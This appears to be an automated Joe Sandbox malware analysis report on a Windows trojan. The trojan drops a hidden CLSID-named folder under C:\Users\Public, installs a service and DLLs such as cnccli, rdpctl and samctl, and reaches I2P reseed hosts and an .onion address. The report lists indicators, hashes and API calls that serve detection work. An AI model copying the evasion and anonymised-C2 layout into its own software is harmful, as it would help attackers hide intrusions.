Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 23_2_00007FFE11505EEA recv,WSAGetLastError,

23_2_00007FFE11505EEA

Source: global traffic	HTTP traffic detected: GET https://banana.incognet.io:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global traffic	HTTP traffic detected: GET https://banana.incognet.io:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global traffic	HTTP traffic detected: GET https://reseed.diva.exchange:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close

Source: global traffic	DNS traffic detected: DNS query: banana.incognet.io
Source: global traffic	DNS traffic detected: DNS query: reseed.diva.exchange

Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000003.2278107155.00000157C5E73000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2278195165.00000157C5E78000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr	String found in binary or memory: http://127.0.0.1:8118
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr	String found in binary or memory: http://identiguy.i2p/hosts.txt
Source: main.exe, 00000020.00000003.2796330606.00000142D8DAB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2796297665.00000142D8DD6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2796330606.00000142D8DA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: main.exe, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954930725.00000142D8DA8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr, 6rRRlGVV.23.dr	String found in binary or memory: http://reg.i2p/hosts.txt
Source: main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://reg.i2p/hosts.txt?~
Source: main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://reg.i2p/hosts.txtei
Source: main.exe, 00000017.00000002.2668148330.00000157C5E3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://reg.i2p/hosts.txtf?
Source: main.exe, 00000020.00000002.2954930725.00000142D8DA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://reg.i2p/hosts.txty-
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr	String found in binary or memory: http://rus.i2p/hosts.txt
Source: main.exe, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr, 6rRRlGVV.23.dr	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt
Source: main.exe, 00000017.00000002.2668148330.00000157C5E3D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/
Source: main.exe, 00000017.00000002.2668148330.00000157C5E3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3/)
Source: main.exe, 00000017.00000002.2668148330.00000157C5E3D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr	String found in binary or memory: http://stats.i2p/cgi-bin/newhosts.txt
Source: Amcache.hve.31.dr	String found in binary or memory: http://upx.sf.net
Source: main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	String found in binary or memory: https://banana.incognet.io/
Source: main.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://banana.incognet.io/W
Source: main.exe, 00000017.00000002.2668284810.00000157C6271000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2292775303.00000157C6272000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2291390149.00000157C6272000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://banana.incognet.io/i2pseeds.su3
Source: main.exe, 00000017.00000003.2291390149.00000157C6272000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2782368111.00000142D89FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://banana.incognet.io:443/i2pseeds.su3
Source: main.exe, 00000017.00000003.2291390149.00000157C6272000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://banana.incognet.io:443/i2pseeds.su3W
Source: main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	String found in binary or memory: https://i2p.ghativega.in/
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr	String found in binary or memory: https://i2p.mooo.com/netDb/
Source: main.exe, 00000020.00000002.2954829051.00000142D899E000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	String found in binary or memory: https://i2p.novg.net/
Source: main.exe, 00000017.00000002.2668148330.00000157C5E68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://i2p.novg.net/K
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr	String found in binary or memory: https://i2pd.readthedocs.io/en/latest/user-guide/configuration/
Source: main.exe, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954930725.00000142D8D50000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	String found in binary or memory: https://i2pseed.creativecowpat.net:8443/
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr	String found in binary or memory: https://legit-website.com/i2pseeds.su3
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr	String found in binary or memory: https://netdb.i2p2.no/
Source: main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	String found in binary or memory: https://reseed-fr.i2pd.xyz/
Source: main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed-fr.i2pd.xyz/I
Source: main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	String found in binary or memory: https://reseed-pl.i2pd.xyz/
Source: main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed-pl.i2pd.xyz/3
Source: main.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed-pl.i2pd.xyz/F
Source: main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	String found in binary or memory: https://reseed.diva.exchange/
Source: main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.diva.exchange/b.c
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr	String found in binary or memory: https://reseed.i2p-projekt.de/
Source: main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	String found in binary or memory: https://reseed.i2pgit.org/
Source: main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.i2pgit.org/6
Source: main.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.i2pgit.org/L
Source: main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	String found in binary or memory: https://reseed.memcpy.io/
Source: main.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.memcpy.io/%
Source: main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	String found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.onion.im/O
Source: main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.onion.im/w
Source: main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954829051.00000142D899E000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	String found in binary or memory: https://reseed.stormycloud.org/
Source: main.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.stormycloud.org/HWUm~GTa
Source: main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	String found in binary or memory: https://reseed2.i2p.net/
Source: main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/vp/p_lib.c
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2668148330.00000157C5E68000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2669826636.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2668148330.00000157C5E3D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954829051.00000142D899E000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	String found in binary or memory: https://www2.mk16.de/
Source: main.exe, 00000017.00000002.2668148330.00000157C5E68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www2.mk16.de/m

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe

Code function: 5_2_00007FF64B93929A inet_addr,ntohl,

5_2_00007FF64B93929A

Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe

Code function: 5_2_00007FF64B93292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,

5_2_00007FF64B93292E

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

File deleted: C:\Windows\Temp\t291wOio

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02734B56	0_2_02734B56
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02735B4A	0_2_02735B4A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_027453FA	0_2_027453FA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0274702E	0_2_0274702E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_027360DA	0_2_027360DA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0274D132	0_2_0274D132
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02737F3A	0_2_02737F3A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02739D02	0_2_02739D02
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0273CDB2	0_2_0273CDB2
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe	Code function: 5_2_00007FF64B93E4E0	5_2_00007FF64B93E4E0
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe	Code function: 5_2_00007FF64B93DE8A	5_2_00007FF64B93DE8A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FF7C1AC1AB0	23_2_00007FF7C1AC1AB0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FF7C1ABC440	23_2_00007FF7C1ABC440
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11510880	23_2_00007FFE11510880
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BE24D0	23_2_00007FFE11BE24D0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11ECEF60	23_2_00007FFE11ECEF60
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE126ECB10	23_2_00007FFE126ECB10
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE1A4FEAA0	23_2_00007FFE1A4FEAA0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE1A528F0E	23_2_00007FFE1A528F0E
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE1A528FFC	23_2_00007FFE1A528FFC
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE1A530480	23_2_00007FFE1A530480
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE1A528CDB	23_2_00007FFE1A528CDB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE1A528DC6	23_2_00007FFE1A528DC6
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE11780880	32_2_00007FFE11780880

Source: Joe Sandbox View	Dropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll A62BDF318386AAAB93F1D25144CFBDC1A1125AAAD867EFC4E49FE79590181EBF
Source: Joe Sandbox View	Dropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll 51C131081921626D22FAF44977D5E4DCFE00E5D6CDDEDA877A82F13631BE7C2E

Source: C:\Windows\System32\icacls.exe

Process token adjusted: Security

Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe	Code function: String function: 00007FF64B9314E2 appears 295 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FF7C1AB2EF2 appears 314 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE11BDC852 appears 526 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE117740D2 appears 473 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE11EC9DC2 appears 405 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE115040D2 appears 473 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE1A5277A2 appears 388 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE126E2072 appears 356 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE1A4F1352 appears 398 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 2656 -ip 2656

Source: evtsrv.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: w3LkirgH.23.dr	Static PE information: Number of sections : 11 > 10
Source: TsG1eHIt.23.dr	Static PE information: Number of sections : 11 > 10
Source: ogg99SMu.23.dr	Static PE information: Number of sections : 11 > 10
Source: dwlmgr.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: cnccli.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: 6rRRlGVV.23.dr	Static PE information: Number of sections : 11 > 10
Source: ROF9A37w.23.dr	Static PE information: Number of sections : 11 > 10
Source: t291wOio.23.dr	Static PE information: Number of sections : 11 > 10
Source: prgmgr.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: file.exe	Static PE information: Number of sections : 11 > 10
Source: libi2p.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: samctl.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: bMZx4vGr.23.dr	Static PE information: Number of sections : 11 > 10
Source: termsrv32.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: rdpctl.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: eKTTDy2k.23.dr	Static PE information: Number of sections : 11 > 10

Source: file.exe, 00000000.00000000.1706105306.00000000008B0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameLAPLINK.EXE: vs file.exe
Source: file.exe, 00000000.00000002.1710097897.00000000025E8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs file.exe
Source: file.exe, 00000001.00000002.2954243691.0000000002758000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameLAPLINK.EXE: vs file.exe

Source: classification engine

Classification label: mal100.troj.evad.winEXE@45/68@2/27

Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe

Code function: 5_2_00007FF64B93855D CreateToolhelp32Snapshot,Process32First,Process32Next,GetLastError,GetLastError,GetLastError,OpenProcess,QueryFullProcessImageNameW,GetLastError,CloseHandle,GetLastError,CloseHandle,

5_2_00007FF64B93855D

Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe

Code function: 5_2_00007FF64B931A19 FindResourceA,LoadResource,GetLastError,GetLastError,GetLastError,GetLastError,

5_2_00007FF64B931A19

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 23_2_00007FF7C1AB1DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,

23_2_00007FF7C1AB1DBC

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 23_2_00007FF7C1AB1DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,

23_2_00007FF7C1AB1DBC

Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe

File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \BaseNamedObjects\Local\WERReportingForProcess2656
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4192:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5472:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:5268:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:332:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1712:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\7mmwpep245voy3fngkym99px3pj5vx36.bat

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7mmwpep245voy3fngkym99px3pj5vx36.bat"

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

